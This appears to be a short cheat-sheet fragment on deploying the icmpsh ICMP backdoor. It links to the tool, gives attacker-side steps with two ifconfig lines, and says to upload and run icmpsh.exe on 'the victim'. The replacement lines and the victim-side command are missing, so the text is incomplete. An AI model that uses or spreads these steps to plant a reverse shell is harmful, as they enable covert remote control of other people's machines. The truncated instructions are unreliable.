[AD REMOVED]
Download the backdoor from: https://github.com/inquisb/icmpsh
Client side
Execute the script: run.sh
If you get some error, try to change the lines:
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
For:
Victim Side
Upload icmpsh.exe to the victim and execute:
[AD REMOVED]